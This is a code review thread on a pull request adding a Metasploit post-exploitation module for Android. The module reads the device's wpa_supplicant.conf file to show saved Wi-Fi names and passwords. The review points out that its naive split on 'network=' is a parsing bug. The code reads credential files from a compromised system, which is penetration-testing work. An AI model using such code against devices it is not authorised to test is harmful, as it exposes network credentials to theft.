modules/post/android/gather/wireless_ap.rb

```diff
@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Android::System
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => "Displays wireless SSIDs and PSKs",
+        'Description'   => %q{
+            This module displays all wireless AP creds saved on the target device.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => ['Auxilus'],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
+        'Platform'       => 'android',
+      }
+    ))
+  end
+
+  def run
+    data = read_file("/data/misc/wifi/wpa_supplicant.conf")
+    parsed = data.split("network=")
```

Comment:
Won't this break if one of the networks or passwords includes `network=`? :trollface:

Reply:
Argh.....yeah It will... Do you have a better way?? It's the best that I could come up with....

Reply:
where did you get the troll emoji btw?